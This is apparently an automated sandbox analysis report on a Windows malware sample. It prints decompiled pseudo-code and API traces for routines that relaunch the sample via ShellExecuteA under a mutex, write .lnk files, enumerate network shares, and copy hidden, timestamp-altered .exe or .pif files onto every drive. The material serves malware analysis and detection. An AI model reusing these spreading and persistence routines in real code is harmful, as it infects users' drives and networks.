                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: ioctlsocket$ErrorLastSleepclosesocketconnectselectsocket
                                • String ID: 3'$@$@
                                • API String ID: 3016611618-2553492011
                                • Opcode ID: 2e44aec0d43b6939f841ef321d7c0eccd17d1d1a7924a8f8bf2f3f1de8c28e52
                                • Instruction ID: 4567b75a6b926c908ac64b0743375fd0b9fdbd1000659d871d5ebe6bce38aeb4
                                • Opcode Fuzzy Hash: 2e44aec0d43b6939f841ef321d7c0eccd17d1d1a7924a8f8bf2f3f1de8c28e52
                                • Instruction Fuzzy Hash: 7E710874964229DBDB24CF90CCC8BE9F3B5AB64304F1085D9E54AA62C5D7B46EC0CF80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 79%
                                			E00426776(void* __eax) {
                                				struct HINSTANCE__* _t23;
                                				_Unknown_base(*)()* _t24;
                                				void* _t33;
                                
                                				if(__eax == 0) {
                                					if( *((intOrPtr*)(_t33 + 0x402774)) != 1) {
                                						goto __eax;
                                					}
                                					_t2 = _t33 + 0x402778; // 0x427c8e
                                					if(GetModuleFileNameA(0, _t2, 0x1fe) == 0) {
                                						L5:
                                						Sleep(0x927c0);
                                						L6:
                                						ExitProcess(0);
                                					}
                                					 *((char*)(_t33 + 0x40277b)) = 0;
                                					_t5 = _t33 + 0x401627; // 0x426b3d
                                					_t23 = LoadLibraryExA(_t5, 0, 0);
                                					_t7 = _t33 + 0x401633; // 0x426b49
                                					_t24 = GetProcAddress(_t23, _t7);
                                					if(_t24 == 0) {
                                						goto L5;
                                					}
                                					_t9 = _t33 + 0x402778; // 0x427c8e
                                					_t10 = _t33 + 0x401426; // 0x42693c
                                					 *_t24(0, _t10, _t9, 0, 0, 1);
                                					_t11 = _t33 + 0x401679; // 0x426b8f
                                					_push(CreateMutexA(0, 0, _t11));
                                					if(GetLastError() != 0) {
                                						goto L6;
                                					}
                                					goto L5;
                                				}
                                				return __eax;
                                			}






                                0x00426778
                                0x004266d7
                                0x0042676e
                                0x0042676e
                                0x004266dd
                                0x004266f3
                                0x00426756
                                0x0042675b
                                0x00426761
                                0x00426763
                                0x00426763
                                0x004266f8
                                0x004266ff
                                0x0042670a
                                0x00426710
                                0x00426718
                                0x00426720
                                0x00000000
                                0x00000000
                                0x00426728
                                0x0042672f
                                0x00426738
                                0x0042673a
                                0x0042674b
                                0x00426754
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00426754
                                0x0042677a

                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\lzxbD4wR0g.exe,000001FE), ref: 004266EB
                                • LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0042670A
                                • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 00426718
                                • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 00426745
                                • GetLastError.KERNEL32(00000000), ref: 0042674C
                                • Sleep.KERNEL32(000927C0), ref: 0042675B
                                • ExitProcess.KERNEL32(00000000), ref: 00426763
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.314403919.0000000000426000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.314272065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314281545.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314297689.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314331044.0000000000425000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314601354.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Similarity
                                • API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
                                • String ID: Ap1mutx7$C:\Users\user\Desktop\lzxbD4wR0g.exe$SHELL32.DLL$ShellExecuteA$open
                                • API String ID: 1721171764-3169474137
                                • Opcode ID: b0ed931fd968b442f8f1776d37207bb224f224b6f23c65082afdcbb7b0463912
                                • Instruction ID: b3967b6317b93eabf05ba3c740029e73110d74f8a3f3e23d628164c7c7ec986a
                                • Opcode Fuzzy Hash: b0ed931fd968b442f8f1776d37207bb224f224b6f23c65082afdcbb7b0463912
                                • Instruction Fuzzy Hash: 7C112D71340289ABEF10DEA09D4DFEA33A9AF84B05F540415FE09FE1E0DAB59600872F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 52%
                                			E02210E71(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
                                				void _v1027;
                                				char _v1028;
                                				char _v4982;
                                				void _v5123;
                                				void _v5124;
                                				void _v6146;
                                				short _v6148;
                                				struct _OVERLAPPED* _v6152;
                                				struct _OVERLAPPED* _v6156;
                                				void* _v6160;
                                				long _v6164;
                                				int _t66;
                                				signed int _t78;
                                				signed int _t80;
                                				void* _t107;
                                				void* _t115;
                                				void* _t116;
                                				void* _t119;
                                
                                				E02218060(0x1810, __ecx);
                                				_v6152 = 0;
                                				_v6164 = 0;
                                				_v6156 = 0;
                                				_v1028 = 0;
                                				memset( &_v1027, 0, 0xff << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v5124 = 0;
                                				memset( &_v5123, 0, 0x3ff << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v6148 = 0;
                                				memset( &_v6146, 0, 0xff << 2);
                                				_t119 = _t116 + 0x24;
                                				asm("stosw");
                                				_t91 =  &_v1028;
                                				 *0x21e1148( &_v1028, _a4);
                                				if( *0x2287d90 < 2) {
                                					L2:
                                					E0220A16B(_t91, _t124, _t115 +  *0x21e114c( &_v1028) - 0x400);
                                					_t119 = _t119 + 4;
                                					 *0x21e106c( &_v1028, ".lnk");
                                					L4:
                                					MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v6148, 0x104);
                                					_v6160 = CreateFileA( &_v1028, 0x40000000, 2, 0, 2, 0x20, 0);
                                					if(_v6160 == 0xffffffff) {
                                						return _v6152;
                                					}
                                					_t66 = lstrlenW( &_v6148);
                                					_t35 = _t66 + 0x8e; // 0x8e
                                					_v6156 = _t66 + _t35;
                                					E0221772B( &_v5124, 0x21e2620, 0x8e);
                                					E0221772B( &_v4982,  &_v6148, lstrlenW( &_v6148) << 1);
                                					WriteFile(_v6160,  &_v5124,  &(_v6156->Internal),  &_v6164, 0);
                                					CloseHandle(_v6160);
                                					return 1;
                                				}
                                				_t78 = E022044CB( &_v1028) & 0x0000ffff;
                                				asm("cdq");
                                				_t91 = 0x64;
                                				_t124 = _t78 % 0x64 - 0x50;
                                				if(_t78 % 0x64 <= 0x50) {
                                					_t80 = E022044CB(0x64);
                                					asm("cdq");
                                					_t107 = 0x227b270 + (_t80 & 0x0000ffff) %  *0x2287d90 * 0x104;
                                					__eflags = _t107;
                                					 *0x21e106c( &_v1028, _t107);
                                					goto L4;
                                				}
                                				goto L2;
                                			}





















                                0x02210e79
                                0x02210e7f
                                0x02210e89
                                0x02210e93
                                0x02210e9d
                                0x02210eb1
                                0x02210eb3
                                0x02210eb5
                                0x02210eb6
                                0x02210eca
                                0x02210ecc
                                0x02210ece
                                0x02210ecf
                                0x02210ee5
                                0x02210ee5
                                0x02210ee7
                                0x02210eed
                                0x02210ef4
                                0x02210f01
                                0x02210f1a
                                0x02210f2f
                                0x02210f34
                                0x02210f43
                                0x02210f76
                                0x02210f8c
                                0x02210fae
                                0x02210fbb
                                0x00000000
                                0x02211055
                                0x02210fc8
                                0x02210fce
                                0x02210fd5
                                0x02210fec
                                0x02211012
                                0x0221103b
                                0x02211048
                                0x00000000
                                0x0221104e
                                0x02210f08
                                0x02210f0d
                                0x02210f0e
                                0x02210f15
                                0x02210f18
                                0x02210f4b
                                0x02210f55
                                0x02210f62
                                0x02210f62
                                0x02210f70
                                0x00000000
                                0x02210f70
                                0x00000000

                                APIs
                                • lstrcpy.KERNEL32(?,?), ref: 02210EF4
                                • lstrlen.KERNEL32(?), ref: 02210F21
                                • lstrcat.KERNEL32(?,.lnk), ref: 02210F43
                                • lstrcat.KERNEL32(?), ref: 02210F70
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 02210F8C
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 02210FA8
                                • lstrlenW.KERNEL32(?), ref: 02210FC8
                                • lstrlenW.KERNEL32(?), ref: 02210FFB
                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0221103B
                                • CloseHandle.KERNEL32(?), ref: 02211048
                                  • Part of subcall function 022044CB: InterlockedExchange.KERNEL32(022190C0,0220A192), ref: 022044E9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: lstrlen$Filelstrcat$ByteCharCloseCreateExchangeHandleInterlockedMultiWideWritelstrcpy
                                • String ID: .lnk
                                • API String ID: 2963584520-24824748
                                • Opcode ID: aa40d51205850ef599a075dd6170688f459c38445bb0b884ae70319143449e26
                                • Instruction ID: e92fd94a4039ecfab36e6ee55e0a85bd48eb118217ee039b4c770b76731ae021
                                • Opcode Fuzzy Hash: aa40d51205850ef599a075dd6170688f459c38445bb0b884ae70319143449e26
                                • Instruction Fuzzy Hash: B64194B6950218ABDB61DBA4CC45FEAB7B9FB48305F0485E8F309A61C0DB745F898F50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WNetEnumResourceA.MPR(?,?,?,?), ref: 02211A92
                                • lstrcpy.KERNEL32(?,00000000), ref: 02211B29
                                • lstrcat.KERNEL32(?,02203D50), ref: 02211B38
                                • lstrcpy.KERNEL32(?,?), ref: 02211B76
                                • lstrlen.KERNEL32(?), ref: 02211B83
                                • lstrcat.KERNEL32(?,02203D54), ref: 02211BA2
                                • lstrlen.KERNEL32(?), ref: 02211BAF
                                • lstrcat.KERNEL32(?,.tmp), ref: 02211BD1
                                • lstrlen.KERNEL32(?,?,00000001,?,?,00000000), ref: 02211C2C
                                  • Part of subcall function 02211060: Sleep.KERNEL32(?,?), ref: 022110BF
                                  • Part of subcall function 02211060: lstrcat.KERNEL32(?,02203D20), ref: 022110DD
                                • DeleteFileA.KERNEL32(?), ref: 02211C4B
                                • Sleep.KERNEL32(00001000), ref: 02211C71
                                • Sleep.KERNEL32(00002000), ref: 02211C92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: lstrcat$Sleeplstrlen$lstrcpy$DeleteEnumFileResource
                                • String ID: .tmp
                                • API String ID: 3940331287-2986845003
                                • Opcode ID: 289d316ba80a9ef9dadd30ede68b83dd53b50da83c251e87c880f213c48550b4
                                • Instruction ID: 1cba98c8079b63557a017a7827ee94436fdfa93da3503a65d4a26a987313c637
                                • Opcode Fuzzy Hash: 289d316ba80a9ef9dadd30ede68b83dd53b50da83c251e87c880f213c48550b4
                                • Instruction Fuzzy Hash: A0418D71950619AFCB24CFA4DC88FAB7BB9AB54306F808884E50D9B144D735DA95CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 79%
                                			E0228D9C0(void* __eax) {
                                				struct HINSTANCE__* _t23;
                                				_Unknown_base(*)()* _t24;
                                				void* _t33;
                                
                                				if(__eax == 0) {
                                					if( *((intOrPtr*)(_t33 + 0x402774)) != 1) {
                                						goto __eax;
                                					}
                                					_t2 = _t33 + 0x402778; // 0x228eed8
                                					if(GetModuleFileNameA(0, _t2, 0x1fe) == 0) {
                                						L5:
                                						Sleep(0x927c0);
                                						L6:
                                						ExitProcess(0);
                                					}
                                					 *((char*)(_t33 + 0x40277b)) = 0;
                                					_t5 = _t33 + 0x401627; // 0x228dd87
                                					_t23 = LoadLibraryExA(_t5, 0, 0);
                                					_t7 = _t33 + 0x401633; // 0x228dd93
                                					_t24 = GetProcAddress(_t23, _t7);
                                					if(_t24 == 0) {
                                						goto L5;
                                					}
                                					_t9 = _t33 + 0x402778; // 0x228eed8
                                					_t10 = _t33 + 0x401426; // 0x228db86
                                					 *_t24(0, _t10, _t9, 0, 0, 1);
                                					_t11 = _t33 + 0x401679; // 0x228ddd9
                                					_push(CreateMutexA(0, 0, _t11));
                                					if(GetLastError() != 0) {
                                						goto L6;
                                					}
                                					goto L5;
                                				}
                                				return __eax;
                                			}






                                0x0228d9c2
                                0x0228d921
                                0x0228d9b8
                                0x0228d9b8
                                0x0228d927
                                0x0228d93d
                                0x0228d9a0
                                0x0228d9a5
                                0x0228d9ab
                                0x0228d9ad
                                0x0228d9ad
                                0x0228d942
                                0x0228d949
                                0x0228d954
                                0x0228d95a
                                0x0228d962
                                0x0228d96a
                                0x00000000
                                0x00000000
                                0x0228d972
                                0x0228d979
                                0x0228d982
                                0x0228d984
                                0x0228d995
                                0x0228d99e
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0228d99e
                                0x0228d9c4

                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,0228EED8,000001FE), ref: 0228D935
                                • LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0228D954
                                • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 0228D962
                                • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0228D98F
                                • GetLastError.KERNEL32(00000000), ref: 0228D996
                                • Sleep.KERNEL32(000927C0), ref: 0228D9A5
                                • ExitProcess.KERNEL32(00000000), ref: 0228D9AD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
                                • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                • API String ID: 1721171764-1163154406
                                • Opcode ID: b0ed931fd968b442f8f1776d37207bb224f224b6f23c65082afdcbb7b0463912
                                • Instruction ID: c1324c3b44c6cc370f83eee9a45808378fbb392ec75c51ed6d290574320b4242
                                • Opcode Fuzzy Hash: b0ed931fd968b442f8f1776d37207bb224f224b6f23c65082afdcbb7b0463912
                                • Instruction Fuzzy Hash: C311DE71255289ABEF60EEF08D0DFDD37A99B44B05F440415FA09EE0E8DBB19204876F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02210CF6(CHAR* _a4) {
                                				void* _v8;
                                				long _v12;
                                				long _v16;
                                				void* _v20;
                                				void* _v24;
                                				long _v28;
                                				void* _v32;
                                
                                				_v16 = 0;
                                				_v12 = 0;
                                				_v28 = 0;
                                				_v8 = 0;
                                				_v20 = 0;
                                				_v24 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x20, 0);
                                				if(_v24 != 0xffffffff) {
                                					_v12 = GetFileSize(_v24, 0);
                                					if(_v12 > 0x98) {
                                						_v8 = GlobalAlloc(0x40, _v12 + 0x1000);
                                						ReadFile(_v24, _v8, _v12,  &_v28, 0);
                                						if(E02217761(_v8, 0x21e2620, 0x8e) == 0) {
                                							_v16 = 1;
                                							_v32 = CreateFileW(_v8 + 0x8e, 0x80000000, 1, 0, 3, 0x20, 0);
                                							if(_v32 != 0xffffffff) {
                                								_v12 = GetFileSize(_v32, 0);
                                								if(_v12 > 0x11170) {
                                									_v20 = GlobalAlloc(0x40, _v12 + 0x1000);
                                									ReadFile(_v32, _v20, _v12,  &_v28, 0);
                                									if(E02204527(_v20, _v12, 0x2203d0c, 9) != 0) {
                                										_v16 = 2;
                                									}
                                									GlobalFree(_v20);
                                								}
                                								CloseHandle(_v32);
                                							}
                                						}
                                						GlobalFree(_v8);
                                					}
                                					CloseHandle(_v24);
                                				}
                                				return _v16;
                                			}










                                0x02210cfc
                                0x02210d03
                                0x02210d0a
                                0x02210d11
                                0x02210d18
                                0x02210d38
                                0x02210d3f
                                0x02210d51
                                0x02210d5b
                                0x02210d73
                                0x02210d88
                                0x02210da6
                                0x02210dac
                                0x02210dd2
                                0x02210dd9
                                0x02210de7
                                0x02210df1
                                0x02210e05
                                0x02210e1a
                                0x02210e39
                                0x02210e3b
                                0x02210e3b
                                0x02210e46
                                0x02210e46
                                0x02210e50
                                0x02210e50
                                0x02210dd9
                                0x02210e5a
                                0x02210e5a
                                0x02210e64
                                0x02210e64
                                0x02210e70

                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 02210D32
                                • GetFileSize.KERNEL32(?,00000000), ref: 02210D4B
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 02210D6D
                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 02210D88
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 02210DCC
                                • GetFileSize.KERNEL32(?,00000000), ref: 02210DE1
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 02210DFF
                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 02210E1A
                                • GlobalFree.KERNEL32(?), ref: 02210E46
                                • CloseHandle.KERNEL32(?), ref: 02210E50
                                • GlobalFree.KERNEL32(?), ref: 02210E5A
                                • CloseHandle.KERNEL32(?), ref: 02210E64
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: File$Global$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 675253578-0
                                • Opcode ID: d3c24642752a827ad9e25b815a214bb6f8712141f5a146c24947cfb3c1559b2b
                                • Instruction ID: cb1007f4a45a4bb3cab57bc3ba87bd4178466800e2efaf9468582d7ecee2c80e
                                • Opcode Fuzzy Hash: d3c24642752a827ad9e25b815a214bb6f8712141f5a146c24947cfb3c1559b2b
                                • Instruction Fuzzy Hash: 00410AB5E90209FBEB10DFE4DC49FAFBBB5AB48701F104548F615BB284D7B45A908B90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 73%
                                			E02213238() {
                                				signed int _t143;
                                				intOrPtr _t183;
                                				intOrPtr _t186;
                                				long _t191;
                                				intOrPtr _t225;
                                				intOrPtr _t240;
                                				void* _t274;
                                				void* _t276;
                                				void* _t278;
                                
                                				L0:
                                				while(1) {
                                					L0:
                                					 *(_t274 - 0x125c) =  *(_t274 - 0x125c) + 1;
                                					L3:
                                					while( *(_t274 - 0x125c) >= 0x1a) {
                                						L38:
                                						Sleep(0x1b58);
                                						if(1 != 0) {
                                							L2:
                                							E02212EBC();
                                							Sleep(0x4e20);
                                							 *(_t274 - 0x1254) = 0;
                                							 *(_t274 - 0x1254) = GetLogicalDrives();
                                							 *(_t274 - 0x125c) = 2;
                                							goto L3;
                                						}
                                						L39:
                                						 *((intOrPtr*)(_t274 - 4)) = 0xffffffff;
                                						_push(0);
                                						RtlExitUserThread();
                                						__eflags = 0;
                                						 *[fs:0x0] =  *((intOrPtr*)(_t274 - 0x10));
                                						return 0;
                                						L41:
                                					}
                                					 *(_t274 - 0x1270) =  *(_t274 - 0x1254) >>  *(_t274 - 0x125c) & 0x00000001;
                                					if( *(_t274 - 0x1270) != 1) {
                                						L37:
                                						continue;
                                					} else {
                                						L5:
                                						 *(_t274 - 0x1250) =  *(_t274 - 0x125c) + 0x41;
                                						 *((char*)(_t274 - 0x124f)) = 0x3a;
                                						 *((char*)(_t274 - 0x124e)) = 0x5c;
                                						 *((char*)(_t274 - 0x124d)) = 0;
                                						 *(_t274 - 0x1270) = GetDriveTypeA(_t274 - 0x1250);
                                						if( *(_t274 - 0x1270) == 5) {
                                							goto L37;
                                						} else {
                                							L6:
                                							_t240 =  *0x21e1830; // 0x2202740
                                							 *0x21e106c(_t274 - 0x1250, _t240);
                                							 *(_t274 - 0x126c) = CreateFileA(_t274 - 0x1250, 0x80000000, 1, 0, 3, 0x20, 0);
                                							if( *(_t274 - 0x126c) == 0xffffffff) {
                                								L29:
                                								 *((intOrPtr*)(_t274 - 0x113c)) = GetFileAttributesA(_t274 - 0x1250);
                                								__eflags =  *((intOrPtr*)(_t274 - 0x113c)) - 0xffffffff;
                                								if( *((intOrPtr*)(_t274 - 0x113c)) != 0xffffffff) {
                                									SetFileAttributesA(_t274 - 0x1250, 0x20);
                                									DeleteFileA(_t274 - 0x1250);
                                									E0220A2AD(_t274 - 0x1250);
                                									_t276 = _t276 + 4;
                                								}
                                								 *(_t274 - 0x126c) = CreateFileA(_t274 - 0x1250, 0x40000000, 2, 0, "true", 0x20, 0);
                                								__eflags =  *(_t274 - 0x126c) - 0xffffffff;
                                								if(__eflags != 0) {
                                									GetSystemTime(_t274 - 0x114c);
                                									 *(_t274 - 0x1140) = ( *(_t274 - 0x1144) & 0x0000ffff) + 7;
                                									SystemTimeToFileTime(_t274 - 0x114c, _t274 - 0x1130);
                                									 *(_t274 - 0x1128) =  *(_t274 - 0x1250);
                                									 *((char*)(_t274 - 0x1127)) =  *((intOrPtr*)(_t274 - 0x124f));
                                									 *((char*)(_t274 - 0x1126)) =  *((intOrPtr*)(_t274 - 0x124e));
                                									 *((char*)(_t274 - 0x1125)) = 0;
                                									E0220A16B( *((intOrPtr*)(_t274 - 0x124f)), __eflags, _t274 - 0x1125);
                                									_t278 = _t276 + 4;
                                									_t143 = E022044CB( *((intOrPtr*)(_t274 - 0x124f)));
                                									asm("cdq");
                                									__eflags = (_t143 & 0x0000ffff) % 0x61 - 0x32;
                                									if(__eflags <= 0) {
                                										 *0x21e106c(_t274 - 0x1128, ".exe");
                                									} else {
                                										 *0x21e106c(_t274 - 0x1128, ".pif");
                                									}
                                									E02212B8E(__eflags, _t274 - 0x101c, _t274 - 0x1125);
                                									_t276 = _t278 + 8;
                                									WriteFile( *(_t274 - 0x126c), _t274 - 0x101c,  *0x21e114c(0), _t274 - 0x101c, _t274 - 0x1270);
                                									SetFileTime( *(_t274 - 0x126c), _t274 - 0x1130, _t274 - 0x1138, _t274 - 0x1268);
                                									CloseHandle( *(_t274 - 0x126c));
                                									SetFileAttributesA(_t274 - 0x1250, 7);
                                									 *(_t274 - 0x126c) = CreateFileA(_t274 - 0x1128, 0x40000000, 2, 0, "true", 0x20, 0);
                                									__eflags =  *(_t274 - 0x126c) - 0xffffffff;
                                									if( *(_t274 - 0x126c) != 0xffffffff) {
                                										WriteFile( *(_t274 - 0x126c),  *(_t274 - 0x1020),  *(_t274 - 0x1024), _t274 - 0x1270, 0);
                                										CloseHandle( *(_t274 - 0x126c));
                                										SetFileAttributesA(_t274 - 0x1128, 7);
                                									}
                                								}
                                								goto L37;
                                							} else {
                                								L7:
                                								GetFileTime( *(_t274 - 0x126c), _t274 - 0x1130, _t274 - 0x1138, _t274 - 0x1268);
                                								if(FileTimeToSystemTime(_t274 - 0x1130, _t274 - 0x114c) == 0 || ( *(_t274 - 0x1140) & 0x0000ffff) != ( *(_t274 - 0x1144) & 0x0000ffff) + 7) {
                                									L28:
                                									CloseHandle( *(_t274 - 0x126c));
                                									goto L29;
                                								} else {
                                									L9:
                                									E02204060(_t274 - 0x101c, 0, 0x1000);
                                									_t276 = _t276 + 0xc;
                                									ReadFile( *(_t274 - 0x126c), _t274 - 0x101c, 0xfa0, _t274 - 0x1260, 0);
                                									CharLowerA(_t274 - 0x101c);
                                									_push(_t274 - 0x101c);
                                									if( *0x21e114c() > 0x40) {
                                										L10:
                                										_t225 =  *0x21e1720; // 0x22024a4
                                										_t183 = E02208DEB(_t274 - 0x101c, _t225);
                                										_t276 = _t276 + 8;
                                										 *((intOrPtr*)(_t274 - 0x1c)) = _t183;
                                										if( *((intOrPtr*)(_t274 - 0x1c)) != 0) {
                                											L11:
                                											L13:
                                											while( *((char*)( *((intOrPtr*)(_t274 - 0x1c)))) != 0) {
                                												if( *((char*)( *((intOrPtr*)(_t274 - 0x1c)))) != 0x3d) {
                                													L26:
                                													_t186 =  *((intOrPtr*)(_t274 - 0x1c)) + 1;
                                													__eflags = _t186;
                                													 *((intOrPtr*)(_t274 - 0x1c)) = _t186;
                                													continue;
                                												} else {
                                													L15:
                                													 *((intOrPtr*)(_t274 - 0x1c)) =  *((intOrPtr*)(_t274 - 0x1c)) + 1;
                                													if( *((char*)( *((intOrPtr*)(_t274 - 0x1c)))) == 0x20) {
                                														 *((intOrPtr*)(_t274 - 0x1c)) =  *((intOrPtr*)(_t274 - 0x1c)) + 1;
                                													}
                                													 *((intOrPtr*)(_t274 - 0x1258)) =  *((intOrPtr*)(_t274 - 0x1c));
                                													L18:
                                													while( *((char*)( *((intOrPtr*)(_t274 - 0x1258)))) != 0xd &&  *((char*)( *((intOrPtr*)(_t274 - 0x1258)))) != 0xa &&  *((char*)( *((intOrPtr*)(_t274 - 0x1258)))) != 0) {
                                														 *((intOrPtr*)(_t274 - 0x1258)) =  *((intOrPtr*)(_t274 - 0x1258)) + 1;
                                													}
                                													 *((char*)( *((intOrPtr*)(_t274 - 0x1258)))) = 0;
                                													 *0x21e1148(_t274 - 0x124d,  *((intOrPtr*)(_t274 - 0x1c)));
                                													_t191 = GetFileAttributesA(_t274 - 0x1250);
                                													__eflags = _t191 - 0xffffffff;
                                													if(_t191 == 0xffffffff) {
                                														CloseHandle( *(_t274 - 0x126c));
                                														 *(_t274 - 0x126c) = CreateFileA(_t274 - 0x1250, 0x40000000, 2, 0, "true", 0x20, 0);
                                														__eflags =  *(_t274 - 0x126c) - 0xffffffff;
                                														if( *(_t274 - 0x126c) != 0xffffffff) {
                                															WriteFile( *(_t274 - 0x126c),  *(_t274 - 0x1020),  *(_t274 - 0x1024), _t274 - 0x1270, 0);
                                															CloseHandle( *(_t274 - 0x126c));
                                															SetFileAttributesA(_t274 - 0x1128, 7);
                                														}
                                													}
                                												}
                                												goto L27;
                                											}
                                										}
                                									}
                                									L27:
                                									while(1) {
                                										L0:
                                										 *(_t274 - 0x125c) =  *(_t274 - 0x125c) + 1;
                                										goto L3;
                                									}
                                								}
                                							}
                                						}
                                					}
                                					goto L38;
                                				}
                                			}












                                0x02213238
                                0x02213238
                                0x02213238
                                0x02213241
                                0x00000000
                                0x02213247
                                0x02213734
                                0x02213739
                                0x02213200
                                0x02213206
                                0x02213206
                                0x02213210
                                0x02213216
                                0x02213226
                                0x0221322c
                                0x00000000
                                0x0221322c
                                0x02213744
                                0x02213744
                                0x0221375d
                                0x0221375f
                                0x02213765
                                0x0221376a
                                0x02213777
                                0x00000000
                                0x02213777
                                0x02213265
                                0x02213272
                                0x0221372f
                                0x00000000
                                0x02213278
                                0x02213278
                                0x02213281
                                0x02213287
                                0x0221328e
                                0x02213295
                                0x022132a9
                                0x022132b6
                                0x00000000
                                0x022132bc
                                0x022132bc
                                0x022132bc
                                0x022132ca
                                0x022132ec
                                0x022132f9
                                0x02213522
                                0x0221352f
                                0x02213535
                                0x0221353c
                                0x02213547
                                0x02213554
                                0x02213561
                                0x02213566
                                0x02213566
                                0x02213585
                                0x0221358b
                                0x02213592
                                0x0221359f
                                0x022135b3
                                0x022135c8
                                0x022135d4
                                0x022135e0
                                0x022135ec
                                0x022135f2
                                0x02213600
                                0x02213605
                                0x02213608
                                0x02213612
                                0x0221361a
                                0x0221361d
                                0x0221363f
                                0x0221361f
